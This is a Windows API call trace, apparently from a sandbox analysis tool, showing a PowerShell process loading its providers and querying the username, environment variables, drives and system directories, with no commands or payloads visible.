	[0854.834] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x3a0) returned 0x0
	[0854.834] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d578 | out: phkResult=0x22d578*=0x3a4) returned 0x0
	[0854.835] RegCloseKey (hKey=0x3a4) returned 0x0
	[0854.835] RegCloseKey (hKey=0x380) returned 0x0
	[0854.835] RegCloseKey (hKey=0x3a0) returned 0x0
	[0854.839] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x2030008
	[0855.995] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30cf4a0*="WSMan", lpRawData=0x30cf210) returned 1
	[0855.996] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0855.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.996] CoTaskMemFree (pv=0x3cead0) 
	[0855.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0855.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0855.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0855.998] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0855.998] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0855.999] CoTaskMemFree (pv=0x1ba30f90) 
	[0855.999] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0855.999] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0855.999] CoTaskMemFree (pv=0x414760) 
	[0856.000] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30d49d8*="Alias", lpRawData=0x30d4768) returned 1
	[0856.001] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.001] CoTaskMemFree (pv=0x3cead0) 
	[0856.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.003] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0856.003] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0856.004] CoTaskMemFree (pv=0x1ba30f90) 
	[0856.004] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0856.004] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0856.004] CoTaskMemFree (pv=0x414760) 
	[0856.004] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30d9fd0*="Environment", lpRawData=0x30d9d60) returned 1
	[0856.006] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.006] CoTaskMemFree (pv=0x3cead0) 
	[0856.007] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.007] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0856.007] CoTaskMemFree (pv=0x3cead0) 
	[0856.007] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.007] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0856.007] CoTaskMemFree (pv=0x3cead0) 
	[0856.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x22d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0856.008] SetErrorMode (uMode=0x1) returned 0x1
	[0856.008] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x22d5c0 | out: lpFileInformation=0x22d5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0856.008] SetErrorMode (uMode=0x1) returned 0x1
	[0856.009] GetLogicalDrives () returned 0x4
	[0856.010] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.011] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0856.011] SetErrorMode (uMode=0x1) returned 0x1
	[0856.012] CoTaskMemAlloc (cb=0x68) returned 0x1b9e85b0
	[0856.012] CoTaskMemAlloc (cb=0x68) returned 0x1b9e8620
	[0856.012] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b9e85b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x22d590, lpMaximumComponentLength=0x22d58c, lpFileSystemFlags=0x22d588, lpFileSystemNameBuffer=0x1b9e8620, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22d590*=0x9c354b42, lpMaximumComponentLength=0x22d58c*=0xff, lpFileSystemFlags=0x22d588*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0856.012] CoTaskMemFree (pv=0x1b9e85b0) 
	[0856.012] CoTaskMemFree (pv=0x1b9e8620) 
	[0856.012] SetErrorMode (uMode=0x1) returned 0x1
	[0856.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0856.013] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.013] SetErrorMode (uMode=0x1) returned 0x1
	[0856.013] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d530 | out: lpFileInformation=0x22d530*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0856.014] SetErrorMode (uMode=0x1) returned 0x1
	[0856.014] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.014] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d180, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0856.014] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0856.015] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.015] SetErrorMode (uMode=0x1) returned 0x1
	[0856.015] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d360 | out: lpFileInformation=0x22d360*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0856.015] SetErrorMode (uMode=0x1) returned 0x1
	[0856.015] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.016] SetErrorMode (uMode=0x1) returned 0x1
	[0856.016] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d360 | out: lpFileInformation=0x22d360*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0856.016] SetErrorMode (uMode=0x1) returned 0x1
	[0856.016] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0856.016] SetErrorMode (uMode=0x1) returned 0x1
	[0856.016] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d400 | out: lpFileInformation=0x22d400*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0856.016] SetErrorMode (uMode=0x1) returned 0x1
	[0856.017] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0856.017] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0856.017] CoTaskMemFree (pv=0x1ba30f90) 
	[0856.017] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0856.017] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0856.017] CoTaskMemFree (pv=0x414760) 
	[0856.018] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30e10c0*="FileSystem", lpRawData=0x30e0e50) returned 1
	[0856.019] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.019] CoTaskMemFree (pv=0x3cead0) 
	[0856.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.021] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0856.021] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0856.022] CoTaskMemFree (pv=0x1ba30f90) 
	[0856.022] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0856.022] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0856.022] CoTaskMemFree (pv=0x414760) 
	[0856.023] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30e6900*="Function", lpRawData=0x30e6690) returned 1
	[0856.026] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0856.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.026] CoTaskMemFree (pv=0x3cead0) 
	[0857.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.576] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0857.576] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0857.576] CoTaskMemFree (pv=0x1ba30f90) 
	[0857.576] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0857.576] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0857.577] CoTaskMemFree (pv=0x414760) 
	[0857.577] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3109128*="Registry", lpRawData=0x3108eb8) returned 1
	[0858.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.601] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0858.601] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0858.602] CoTaskMemFree (pv=0x1ba30f90) 
	[0858.602] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0858.602] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0858.602] CoTaskMemFree (pv=0x414760) 
	[0858.602] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x310e540*="Variable", lpRawData=0x310e2d0) returned 1
	[0858.606] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0858.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.606] CoTaskMemFree (pv=0x3cead0) 
	[0858.609] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0858.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.610] CoTaskMemFree (pv=0x3cead0) 
	[0858.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0858.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0858.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0858.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0863.715] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0863.715] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22d808 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d808) returned 0x1
	[0863.716] CoTaskMemFree (pv=0x1ba30f90) 
	[0863.716] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0863.716] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22d848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d848) returned 1
	[0863.716] CoTaskMemFree (pv=0x414760) 
	[0863.717] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3122158*="Certificate", lpRawData=0x3121ee8) returned 1
	[0864.612] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0864.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.612] CoTaskMemFree (pv=0x3cead0) 
	[0864.617] GetLogicalDrives () returned 0x4
	[0864.617] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0864.619] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0864.624] CoTaskMemAlloc (cb=0x20e) returned 0x46c590
	[0864.624] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x46c590 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0864.624] CoTaskMemFree (pv=0x46c590) 
	[0864.626] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0864.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.626] CoTaskMemFree (pv=0x3cead0) 
	[0864.626] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0864.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.626] CoTaskMemFree (pv=0x3cead0) 
	[0865.692] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0865.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.692] CoTaskMemFree (pv=0x3cead0) 
	[0865.697] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0865.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.698] CoTaskMemFree (pv=0x3cead0) 
	[0865.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0865.699] SetErrorMode (uMode=0x1) returned 0x1
	[0865.699] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.801] SetErrorMode (uMode=0x1) returned 0x1
	[0872.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.802] SetErrorMode (uMode=0x1) returned 0x1
	[0872.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.802] SetErrorMode (uMode=0x1) returned 0x1
	[0872.803] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0872.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.803] CoTaskMemFree (pv=0x3cead0) 
	[0872.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.813] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
